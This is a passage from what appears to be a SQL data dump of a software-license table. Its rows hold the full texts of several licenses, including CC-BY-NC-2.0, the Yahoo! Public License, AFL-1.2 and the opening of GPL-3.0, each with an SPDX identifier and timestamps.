files.\n\n2. A copy of this text file must be distributed along with any copies of Qhull\nthat you redistribute; this includes copies that you have modified, or copies\nof programs or other software products that include Qhull.\n\n3. If you modify Qhull, you must include a notice giving the name of the person\nperforming the modification, the date of modification, and the reason for\nsuch modification.\n\n4. When distributing modified versions of Qhull, or other software products\nthat include Qhull, you must provide notice that the original source code\nmay be obtained as noted above.\n\n5. There is no warranty or other guarantee of fitness for Qhull, it is provided\nsolely \"as is\". Bug reports or fixes may be sent to qhull_bug@qhull.org; the\nauthors may or may not act on them as they desire.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(131,'CC-BY-NC-2.0','Creative Commons Attribution-NonCommercial 2.0 CREATIVE COMMONS CORPORATION\nIS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS\nLICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS\nPROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING\nFROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE OR COPYRIGHT LAW IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS\nCONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Collective Work\" means a work, such as a periodical issue, anthology or\nencyclopedia, in which the Work in its entirety in unmodified form, along\nwith a number of other contributions, constituting separate and independent\nworks in themselves, are assembled into a collective whole. A work that constitutes\na Collective Work will not be considered a Derivative Work (as defined below)\nfor the purposes of this License.\n\nb. \"Derivative Work\" means a work based upon the Work or upon the Work and\nother pre-existing works, such as a translation, musical arrangement, dramatization,\nfictionalization, motion picture version, sound recording, art reproduction,\nabridgment, condensation, or any other form in which the Work may be recast,\ntransformed, or adapted, except that a work that constitutes a Collective\nWork will not be considered a Derivative Work for the purpose of this License.\nFor the avoidance of doubt, where the Work is a musical composition or sound\nrecording, the synchronization of the Work in timed-relation with a moving\nimage (\"synching\") will be considered a Derivative Work for the purpose of\nthis License.\n\nc. \"Licensor\" means the individual or entity that offers the Work under the\nterms of this License.\n\n d. \"Original Author\" means the individual or entity who created the Work.\n\ne. \"Work\" means the copyrightable work of authorship offered under the terms\nof this License.\n\nf. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\n2. Fair Use Rights. Nothing in this license is intended to reduce, limit,\nor restrict any rights arising from fair use, first sale or other limitations\non the exclusive rights of the copyright owner under copyright law or other\napplicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to reproduce the Work, to incorporate the Work into one or more Collective\nWorks, and to reproduce the Work as incorporated in the Collective Works;\n\n b. to create and reproduce Derivative Works;\n\nc. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission the Work including\nas incorporated in Collective Works;\n\nd. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission Derivative Works;\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nAll rights not expressly granted by Licensor are hereby reserved, including\nbut not limited to the rights set forth in Sections 4(d) and 4(e).\n\n4. Restrictions.The license granted in Section 3 above is expressly made subject\nto and limited by the following restrictions:\n\na. You may distribute, publicly display, publicly perform, or publicly digitally\nperform the Work only under the terms of this License, and You must include\na copy of, or the Uniform Resource Identifier for, this License with every\ncopy or phonorecord of the Work You distribute, publicly display, publicly\nperform, or publicly digitally perform. You may not offer or impose any terms\non the Work that alter or restrict the terms of this License or the recipients\'\nexercise of the rights granted hereunder. You may not sublicense the Work.\nYou must keep intact all notices that refer to this License and to the disclaimer\nof warranties. You may not distribute, publicly display, publicly perform,\nor publicly digitally perform the Work with any technological measures that\ncontrol access or use of the Work in a manner inconsistent with the terms\nof this License Agreement. The above applies to the Work as incorporated in\na Collective Work, but this does not require the Collective Work apart from\nthe Work itself to be made subject to the terms of this License. If You create\na Collective Work, upon notice from any Licensor You must, to the extent practicable,\nremove from the Collective Work any reference to such Licensor or the Original\nAuthor, as requested. If You create a Derivative Work, upon notice from any\nLicensor You must, to the extent practicable, remove from the Derivative Work\nany reference to such Licensor or the Original Author, as requested.\n\nb. You may not exercise any of the rights granted to You in Section 3 above\nin any manner that is primarily intended for or directed toward commercial\nadvantage or private monetary compensation. The exchange of the Work for other\ncopyrighted works by means of digital file-sharing or otherwise shall not\nbe considered to be intended for or directed toward commercial advantage or\nprivate monetary compensation, provided there is no payment of any monetary\ncompensation in connection with the exchange of copyrighted works.\n\nc. If you distribute, publicly display, publicly perform, or publicly digitally\nperform the Work or any Derivative Works or Collective Works, You must keep\nintact all copyright notices for the Work and give the Original Author credit\nreasonable to the medium or means You are utilizing by conveying the name\n(or pseudonym if applicable) of the Original Author if supplied; the title\nof the Work if supplied; to the extent reasonably practicable, the Uniform\nResource Identifier, if any, that Licensor specifies to be associated with\nthe Work, unless such URI does not refer to the copyright notice or licensing\ninformation for the Work; and in the case of a Derivative Work, a credit identifying\nthe use of the Work in the Derivative Work (e.g., \"French translation of the\nWork by Original Author,\" or \"Screenplay based on original Work by Original\nAuthor\"). Such credit may be implemented in any reasonable manner; provided,\nhowever, that in the case of a Derivative Work or Collective Work, at a minimum\nsuch credit will appear where any other comparable authorship credit appears\nand in a manner at least as prominent as such other comparable authorship\ncredit.\n\n d. For the avoidance of doubt, where the Work is a musical composition:\n\ni. Performance Royalties Under Blanket Licenses. Licensor reserves the exclusive\nright to collect, whether individually or via a performance rights society\n(e.g. ASCAP, BMI, SESAC), royalties for the public performance or public digital\nperformance (e.g. webcast) of the Work if that performance is primarily intended\nfor or directed toward commercial advantage or private monetary compensation.\n\nii. Mechanical Rights and Statutory Royalties. Licensor reserves the exclusive\nright to collect, whether individually or via a music rights agency or designated\nagent (e.g. Harry Fox Agency), royalties for any phonorecord You create from\nthe Work (\"cover version\") and distribute, subject to the compulsory license\ncreated by 17 USC Section 115 of the US Copyright Act (or the equivalent in\nother jurisdictions), if Your distribution of such cover version is primarily\nintended for or directed toward commercial advantage or private monetary compensation.\nWebcasting Rights and Statutory Royalties. For the avoidance of doubt, where\nthe Work is a sound recording, Licensor reserves the exclusive right to collect,\nwhether individually or via a performance-rights society (e.g. SoundExchange),\nroyalties for the public digital performance (e.g. webcast) of the Work, subject\nto the compulsory license created by 17 USC Section 114 of the US Copyright\nAct (or the equivalent in other jurisdictions), if Your public digital performance\nis primarily intended for or directed toward commercial advantage or private\nmonetary compensation.\n\n 5. Representations, Warranties and Disclaimer\n\nUNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS\nTHE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING\nTHE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT,\nOR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE\nOF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE\nEXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nIN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL,\nINCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS\nLICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Derivative Works or Collective Works from You under this\nLicense, however, will not have their licenses terminated provided such individuals\nor entities remain in full compliance with those licenses. Sections 1, 2,\n5, 6, 7, and 8 will survive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You distribute or publicly digitally perform the Work or a Collective\nWork, the Licensor offers to the recipient a license to the Work on the same\nterms and conditions as the license granted to You under this License.\n\nb. Each time You distribute or publicly digitally perform a Derivative Work,\nLicensor offers to the recipient a license to the original Work on the same\nterms and conditions as the license granted to You under this License.\n\nc. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nd. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\ne. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, neither party will use the trademark \"Creative Commons\"\nor any related trademark or logo of Creative Commons without the prior written\nconsent of Creative Commons. Any permitted use will be in compliance with\nCreative Commons\' then-current trademark usage guidelines, as may be published\non its website or otherwise made available upon request from time to time.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(132,'YPL-1.0','Yahoo! Public License, Version 1.0 (YPL)\n\nThis Yahoo! Public License (this \"Agreement\") is a legal agreement that describes\nthe terms under which Yahoo! Inc., a Delaware corporation having its principal\nplace of business at 701 First Avenue, Sunnyvale, California 94089 (\"Yahoo!\")\nwill provide software to you via download or otherwise (\"Software\"). By using\nthe Software, you, an individual or an entity (\"You\") agree to the terms of\nthis Agreement.\n\nIn consideration of the mutual promises and upon the terms and conditions\nset forth below, the parties agree as follows:\n\n 1. Grant of Copyright License\n\n1.1 - Subject to the terms and conditions of this Agreement, Yahoo! hereby\ngrants to You, under any and all of its copyright interest in and to the Software,\na royalty-free, non-exclusive, non-transferable license to copy, modify, compile,\nexecute, and distribute the Software and Modifications. For the purposes of\nthis Agreement, any change to, addition to, or abridgement of the Software\nmade by You is a \"Modification;\" however, any file You add to the Software\nthat does not contain any part of the Software is not a \"Modification.\"\n\n1.2 - If You are an individual acting on behalf of a corporation or other\nentity, Your use of the Software or any Modification is subject to Your having\nthe authority to bind such corporation or entity to this Agreement. Providing\ncopies to persons within such corporation or entity is not considered distribution\nfor purposes of this Agreement.\n\n1.3 - For the Software or any Modification You distribute in source code format,\nYou must do so only under the terms of this Agreement, and You must include\na complete copy of this Agreement with Your distribution. With respect to\nany Modification You distribute in source code format, the terms of this Agreement\nwill apply to You in the same way those terms apply to Yahoo! with respect\nto the Software. In other words, when You are distributing Modifications under\nthis Agreement, You \"stand in the shoes\" of Yahoo! in terms of the rights\nYou grant and how the terms and conditions apply to You and the licensees\nof Your Modifications. Notwithstanding the foregoing, when You \"stand in the\nshoes\" of Yahoo!, You are not subject to the jurisdiction provision under\nSection 7, which requires all disputes under this Agreement to be subject\nto the jurisdiction of federal or state courts of northern California.\n\n1.4 - For the Software or any Modification You distribute in compiled or object\ncode format, You must also provide recipients with access to the Software\nor Modification in source code format along with a complete copy of this Agreement.\nThe distribution of the Software or Modifications in compiled or object code\nformat may be under a license of Your choice, provided that You are in compliance\nwith the terms of this Agreement. In addition, You must make absolutely clear\nthat any license terms applying to such Software or Modification that differ\nfrom this Agreement are offered by You alone and not by Yahoo!, and that such\nlicense does not restrict recipients from exercising rights in the source\ncode to the Software granted by Yahoo! under this Agreement or rights in the\nsource code to any Modification granted by You as described in Section 1.3.\n\n1.5 - This Agreement does not limit Your right to distribute files that are\nentirely Your own work (i.e., which do not incorporate any portion of the\nSoftware and are not Modifications) under any terms You choose.\n\n 2. Support\n\nYahoo! has no obligation to provide technical support or updates to You. Nothing\nin this Agreement requires Yahoo! to enter into any license with You for any\nother edition of the Software.\n\n 3. Intellectual Property Rights\n\n3.1 - Except for the license expressly granted under copyright in Section\n1.1, no rights, licenses or forbearances are granted or may arise in relation\nto this Agreement whether expressly, by implication, exhaustion, estoppel\nor otherwise. All rights, including all intellectual property rights, that\nare not expressly granted under this Agreement are hereby reserved.\n\n3.2 - In any copy of the Software or in any Modification you create, You must\nretain and reproduce, any and all copyright, patent, trademark, and attribution\nnotices that are included in the Software in the same form as they appear\nin the Software. This includes the preservation of attribution notices in\nthe form of trademarks or logos that exist within a user interface of the\nSoftware.\n\n3.3 - This license does not grant You rights to use any party\'s name, logo,\nor trademarks, except solely as necessary to comply with Section 3.2.\n\n 4. Disclaimer of Warranties\n\nTHE SOFTWARE IS PROVIDED \"AS IS\" AND WITHOUT WARRANTY OF ANY KIND. YAHOO!\nMAKES NO WARRANTIES, WHETHER EXPRESS, IMPLIED, OR STATUTORY REGARDING OR RELATING\nTO THE SOFTWARE. SPECIFICALLY, YAHOO! DOES NOT WARRANT THAT THE SOFTWARE WILL\nBE ERROR FREE OR WILL PERFORM IN AN UNINTERRUPTED MANNER. TO THE GREATEST\nEXTENT ALLOWED BY LAW, YAHOO! SPECIFICALLY DISCLAIMS ALL IMPLIED WARRANTIES\nOF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE (EVEN IF YAHOO! HAD BEEN\nINFORMED OF SUCH PURPOSE), AND NONINFRINGEMENT WITH RESPECT TO THE SOFTWARE,\nANY MODIFICATIONS THERETO AND WITH RESPECT TO THE USE OF THE FOREGOING.\n\n 5. Limitation of Liability\n\nIN NO EVENT WILL YAHOO! BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\nEXEMPLARY, OR CONSEQUENTIAL DAMAGES OF ANY KIND (INCLUDING WITHOUT LIMITATION\nLOSS OF PROFITS, LOSS OF USE, BUSINESS INTERRUPTION, LOSS OF DATA, COST OF\nCOVER) IN CONNECTION WITH OR ARISING OUT OF OR RELATING TO THE FURNISHING,\nPERFORMANCE OR USE OF THE SOFTWARE OR ANY OTHER RIGHTS GRANTED HEREUNDER,\nWHETHER ALLEGED AS A BREACH OF CONTRACT OR TORTIOUS CONDUCT, INCLUDING NEGLIGENCE,\nAND EVEN IF YAHOO! HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 6. Term and Termination\n\n6.1 - This Agreement will continue in effect unless and until terminated earlier\npursuant to this Section 6.\n\n6.2 - In the event Yahoo! determines that You have breached this Agreement,\nYahoo! may terminate this Agreement.\n\n6.3 - All licenses granted hereunder shall terminate upon the termination\nof this Agreement. Termination will be in addition to any rights and remedies\navailable to Yahoo! at law or equity or under this Agreement.\n\n6.4 - Termination of this Agreement will not affect the provisions regarding\nreservation of rights (Section 3.1), provisions disclaiming or limiting Yahoo!\'s\nliability (Sections 4 and 5), Termination (Section 6) or Miscellaneous (Section\n7), which provisions will survive termination of this Agreement.\n\n 7. Miscellaneous\n\nThis Agreement contains the entire agreement of the parties with respect to\nthe subject matter of this Agreement and supersedes all previous communications,\nrepresentations, understandings and agreements, either oral or written, between\nthe parties with respect to said subject matter. The relationship of the parties\nhereunder is that of independent contractors, and this Agreement will not\nbe construed as creating an agency, partnership, joint venture or any other\nform of legal association between the parties. If any term, condition, or\nprovision in this Agreement is found to be invalid, unlawful or unenforceable\nto any extent, this Agreement will be construed in a manner that most closely\neffectuates the intent of this Agreement. Such invalid term, condition or\nprovision will be severed from the remaining terms, conditions and provisions,\nwhich will continue to be valid and enforceable to the fullest extent permitted\nby law. This Agreement will be interpreted and construed in accordance with\nthe laws of the State of California and the United States of America, without\nregard to conflict of law principles. The U.N. Convention on Contracts for\nthe International Sale of Goods shall not apply to this Agreement. All disputes\narising out of this Agreement involving Yahoo! or any of its subsidiaries\nshall be subject to the jurisdiction of the federal or state courts of northern\nCalifornia, with venue lying in Santa Clara County, California. No rights\nmay be assigned, no obligations may be delegated, and this Agreement may not\nbe transferred by You, in whole or in part, whether voluntary or by operation\nof law, including by way of sale of assets, merger or consolidation, without\nthe prior written consent of Yahoo!, and any purported assignment, delegation\nor transfer without such consent shall be void ab initio. Any waiver of the\nprovisions of this Agreement or of a party\'s rights or remedies under this\nAgreement must be in writing to be effective. Failure, neglect or delay by\na party to enforce the provisions of this Agreement or its rights or remedies\nat any time, will not be construed or be deemed to be a waiver of such party\'s\nrights under this Agreement and will not in any way affect the validity of\nthe whole or any part of this Agreement or prejudice such party\'s right to\ntake subsequent action.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(133,'ADSL','This software code is made available \"AS IS\" without warranties of any kind.\nYou may copy, display, modify and redistribute the software code either by\nitself or as incorporated into your code; provided that > you do not remove\nany proprietary notices. Your use of this software code is at your own risk\nand you waive any claim against Amazon Digital Services, Inc. or its affiliates\nwith respect to your use of this software code. (c) 2006 Amazon Digital Services,\nInc. or its affiliates.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(134,'psfrag','psfrag.dtx\n\nCopyright (C) 1996 Craig Barratt, Michael C. Grant, and David Carlisle.\n\nAll rights are reserved.\n\nThis system is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. Don\'t come complaining to us if you modify this\nfile and it doesn\'t work! If this file is modified by anyone but the authors,\nthose changes and their authors must be explicitly stated HERE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(135,'AFL-1.2','Academic Free License\n\nVersion 1.2 This Academic Free License applies to any original work of authorship\n(the \"Original Work\") whose owner (the \"Licensor\") has placed the following\nnotice immediately following the copyright notice for the Original Work:\n\nLicensed under the Academic Free License version 1.2\n\nGrant of License. Licensor hereby grants to any person obtaining a copy of\nthe Original Work (\"You\") a world-wide, royalty-free, non-exclusive, perpetual,\nnon-sublicenseable license (1) to use, copy, modify, merge, publish, perform,\ndistribute and/or sell copies of the Original Work and derivative works thereof,\nand (2) under patent claims owned or controlled by the Licensor that are embodied\nin the Original Work as furnished by the Licensor, to make, use, sell and\noffer for sale the Original Work and derivative works thereof, subject to\nthe following conditions.\n\nAttribution Rights. You must retain, in the Source Code of any Derivative\nWorks that You create, all copyright, patent or trademark notices from the\nSource Code of the Original Work, as well as any notices of licensing and\nany descriptive text identified therein as an \"Attribution Notice.\" You must\ncause the Source Code for any Derivative Works that You create to carry a\nprominent Attribution Notice reasonably calculated to inform recipients that\nYou have modified the Original Work.\n\nExclusions from License Grant. Neither the names of Licensor, nor the names\nof any contributors to the Original Work, nor any of their trademarks or service\nmarks, may be used to endorse or promote products derived from this Original\nWork without express prior written permission of the Licensor.\n\nWarranty and Disclaimer of Warranty. Licensor warrants that the copyright\nin and to the Original Work is owned by the Licensor or that the Original\nWork is distributed by Licensor under a valid current license from the copyright\nowner. Except as expressly stated in the immediately proceeding sentence,\nthe Original Work is provided under this License on an \"AS IS\" BASIS and WITHOUT\nWARRANTY, either express or implied, including, without limitation, the warranties\nof NON-INFRINGEMENT, MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\nTHE ENTIRE RISK AS TO THE QUALITY OF THE ORIGINAL WORK IS WITH YOU. This DISCLAIMER\nOF WARRANTY constitutes an essential part of this License. No license to Original\nWork is granted hereunder except under this disclaimer.\n\nLimitation of Liability. Under no circumstances and under no legal theory,\nwhether in tort (including negligence), contract, or otherwise, shall the\nLicensor be liable to any person for any direct, indirect, special, incidental,\nor consequential damages of any character arising as a result of this License\nor the use of the Original Work including, without limitation, damages for\nloss of goodwill, work stoppage, computer failure or malfunction, or any and\nall other commercial damages or losses. This limitation of liability shall\nnot apply to liability for death or personal injury resulting from Licensor\'s\nnegligence to the extent applicable law prohibits such limitation. Some jurisdictions\ndo not allow the exclusion or limitation of incidental or consequential damages,\nso this exclusion and limitation may not apply to You.\n\nLicense to Source Code. The term \"Source Code\" means the preferred form of\nthe Original Work for making modifications to it and all available documentation\ndescribing how to modify the Original Work. Licensor hereby agrees to provide\na machine-readable copy of the Source Code of the Original Work along with\neach copy of the Original Work that Licensor distributes. Licensor reserves\nthe right to satisfy this obligation by placing a machine-readable copy of\nthe Source Code in an information repository reasonably calculated to permit\ninexpensive and convenient access by You for as long as Licensor continues\nto distribute the Original Work, and by publishing the address of that information\nrepository in a notice immediately following the copyright notice that applies\nto the Original Work.\n\nMutual Termination for Patent Action. This License shall terminate automatically\nand You may no longer exercise any of the rights granted to You by this License\nif You file a lawsuit in any court alleging that any OSI Certified open source\nsoftware that is licensed under any license containing this \"Mutual Termination\nfor Patent Action\" clause infringes any patent claims that are essential to\nuse that software.\n\nRight to Use. You may use the Original Work in all ways not otherwise restricted\nor conditioned by this License or by law, and Licensor promises not to interfere\nwith or be responsible for such uses by You.\n\nThis license is Copyright (C) 2002 Lawrence E. Rosen. All rights reserved.\n\nPermission is hereby granted to copy and distribute this license without modification.\nThis license may not be modified without the express written permission of\nits copyright owner.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(136,'GPL-3.0-only','GNU GENERAL PUBLIC LICENSE\n\nVersion 3, 29 June 2007\n\nCopyright © 2007 Free Software Foundation, Inc. <http s ://fsf.org/>\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\nPreamble\n\nThe GNU General Public License is a free, copyleft license for software and\nother kinds of works.\n\nThe licenses for most software and other practical works are designed to take\naway your freedom to share and change the works. By contrast, the GNU General\nPublic License is intended to guarantee your freedom to share and change all\nversions of a program--to make sure it remains free software for all its users.\nWe, the Free Software Foundation, use the GNU General Public License for most\nof our software; it applies also to any other work released this way by its\nauthors. You can apply it to your programs, too.\n\nWhen we speak of free software, we are referring to freedom, not price. Our\nGeneral Public Licenses are designed to make sure that you have the freedom\nto distribute copies of free software (and charge for them if you wish), that\nyou receive source code or can get it if you want it, that you can change\nthe software or use pieces of it in new free programs, and that you know you\ncan do these things.\n\nTo protect your rights, we need to prevent others from denying you these rights\nor asking you to surrender the rights. Therefore, you have certain responsibilities\nif you distribute copies of the software, or if you modify it: responsibilities\nto respect the freedom of others.\n\nFor example, if you distribute copies of such a program, whether gratis or\nfor a fee, you must pass on to the recipients the same freedoms that you received.\nYou must make sure that they, too, receive or can get the source code. And\nyou must show them these terms so they know their rights.\n\nDevelopers that use the GNU GPL protect your rights with two steps: (1) assert\ncopyright on the software, and (2) offer you this License giving you legal\npermission to copy, distribute and/or modify it.\n\nFor the developers\' and authors\' protection, the GPL clearly explains that\nthere is no warranty for this free software. For both users\' and authors\'\nsake, the GPL requires that modified versions be marked as changed, so that\ntheir problems will not be attributed erroneously to authors of previous versions.\n\nSome devices are designed to deny users access to install or run modified\nversions of the software inside them, although the manufacturer can do so.\nThis is fundamentally incompatible with the aim of protecting users\' freedom\nto change the software. The systematic pattern of such abuse occurs in the\narea of products for individuals to use, which is precisely where it is most\nunacceptable. Therefore, we have designed this version of the GPL to prohibit\nthe practice for those products. If such problems arise substantially in other\ndomains, we stand ready to extend this provision to those domains in future\nversions of the GPL, as needed to protect the freedom of users.\n\nFinally, every program is threatened constantly by software patents. States\nshould not allow patents to restrict development and use of software on general-purpose\ncomputers, but in those that do, we wish to avoid the special danger that\npatents applied to a free program could make it effectively proprietary. To\nprevent this, the GPL assures that patents cannot be used to render the program\nnon-free.\n\nThe precise terms and conditions for copying, distribution and modification\nfollow.\n\nTERMS AND CONDITIONS\n\n 0. Definitions.\n\n \"This License\" refers to version 3 of the GNU General Public License.\n\n\"Copyright\" also means copyright-like laws that apply to other kinds of works,\nsuch as semiconductor masks.\n\n\"The Program\" refers to any copyrightable work licensed under this License.\nEach licensee is addressed as \"you\". \"Licensees\" and \"recipients\" may be individuals\nor organizations.\n\nTo \"modify\" a work means to copy from or adapt all or part of the work in\na fashion requiring copyright permission, other than the making of an exact\ncopy. The resulting work is called a \"modified version\" of the earlier work\nor a work \"based on\" the earlier work.\n\nA \"covered work\" means either the unmodified Program or a work based on the\nProgram.\n\nTo \"propagate\" a work means to do anything with it that, without permission,\nwould make you directly or secondarily liable for infringement under applicable\ncopyright law, except executing it on a computer or modifying a private copy.\nPropagation includes copying, distribution (with or without modification),\nmaking available to the public, and in some countries other activities as\nwell.\n\nTo \"convey\" a work means any kind of propagation that enables other parties\nto make or receive copies. Mere interaction with a user through a computer\nnetwork, with no transfer of a copy, is not conveying.\n\nAn interactive user interface displays \"Appropriate Legal Notices\" to the\nextent that it includes a convenient and prominently visible feature that\n(1) displays an appropriate copyright notice, and (2) tells the user that\nthere is no warranty for the work (except to the extent that warranties are\nprovided), that licensees may convey the work under this License, and how\nto view a copy of this License. If the interface presents a list of user commands\nor options, such as a menu, a prominent item in the list meets this criterion.\n\n 1. Source Code.\n\nThe \"source code\" for a work means the preferred form of the work for making\nmodifications to it. \"Object code\" means any non-source form of a work.\n\nA \"Standard Interface\" means an interface that either is an official standard\ndefined by a recognized standards body, or, in the case of interfaces specified\nfor a particular programming language, one that is widely used among developers\nworking in that language.\n\nThe \"System Libraries\" of an executable work include anything, other than\nthe work as a whole, that (a) is included in the normal form of packaging\na Major Component, but which is not part of that Major Component, and (b)\nserves only to enable use of the work with that Major Component, or to implement\na Standard Interface for which an implementation is available to the public\nin source code form. A \"Major Component\", in this context, means a major essential\ncomponent (kernel, window system, and so on) of the specific operating system\n(if any) on which the executable work runs, or a compiler used to produce\nthe work, or an object code interpreter used to run it.\n\nThe \"Corresponding Source\" for a work in object code form means all the source\ncode needed to generate, install, and (for an executable work) run the object\ncode and to modify the work, including scripts to control those activities.\nHowever, it does not include the work\'s System Libraries, or general-purpose\ntools or generally available free programs which are used unmodified in performing\nthose activities but which are not part of the work. For example, Corresponding\nSource includes interface definition files associated with source files for\nthe work, and the source code for shared libraries and dynamically linked\nsubprograms that the work is specifically designed to require, such as by\nintimate data communication or control flow between those subprograms and\nother parts of the work.\n\nThe Corresponding Source need not include anything that users can regenerate\nautomatically from other parts of the Corresponding Source.\n\n The Corresponding Source for a work in source code form is that same work.\n\n 2. Basic Permissions.\n\nAll rights granted under this License are granted for the term of copyright\non the Program, and are irrevocable provided the stated conditions are met.\nThis License explicitly affirms your unlimited permission to run the unmodified\nProgram. The output from running a covered work is covered by this License\nonly if the output, given its content, constitutes a covered work. This License\nacknowledges your rights of fair use or other equivalent, as provided by copyright\nlaw.\n\nYou may make, run and propagate covered works that you do not convey, without\nconditions so long as your license otherwise remains in force. You may convey\ncovered works to others for the sole purpose of having them make modifications\nexclusively for you, or provide you with facilities for running those works,\nprovided that you comply with the terms of this License in conveying all material\nfor which you do not control copyright. Those thus making or running the covered\nworks for you must do so exclusively on your behalf, under your direction\nand control, on terms that prohibit them from making any copies of your copyrighted\nmaterial outside their relationship with you.\n\nConveying under any other circumstances is permitted solely under the conditions\nstated below. Sublicensing is not allowed; section 10 makes it unnecessary.\n\n 3. Protecting Users\' Legal Rights From Anti-Circumvention Law.\n\nNo covered work shall be deemed part of an effective technological measure\nunder any applicable law fulfilling obligations under article 11 of the WIPO\ncopyright treaty adopted on 20 December 1996, or similar laws prohibiting\nor restricting circumvention of such measures.\n\nWhen you convey a covered work, you waive any legal power to forbid circumvention\nof technological measures to the extent such circumvention is effected by\nexercising rights under this License with respect to the covered work, and\nyou disclaim any intention to limit operation or modification of the work\nas a means of enforcing, against the work\'s users, your or third parties\'\nlegal rights to forbid circumvention of technological measures.\n\n 4. Conveying Verbatim Copies.\n\nYou may convey verbatim copies of the Program\'s source code as you receive\nit, in any medium, provided that you conspicuously and appropriately publish\non each copy an appropriate copyright notice; keep intact all notices stating\nthat this License and any non-permissive terms added in accord with section\n7 apply to the code; keep intact all notices of the absence of any warranty;\nand give all recipients a copy of this License along with the Program.\n\nYou may charge any price or no price for each copy that you convey, and you\nmay offer support or warranty protection for a fee.\n\n 5. Conveying Modified Source Versions.\n\nYou may convey a work based on the Program, or the modifications to produce\nit from the Program, in the form of source code under the terms of section\n4, provided that you also meet all of these conditions:\n\na) The work must carry prominent notices stating that you modified it, and\ngiving a relevant date.\n\nb) The work must carry prominent notices stating that it is released under\nthis License and any conditions added under section 7. This requirement 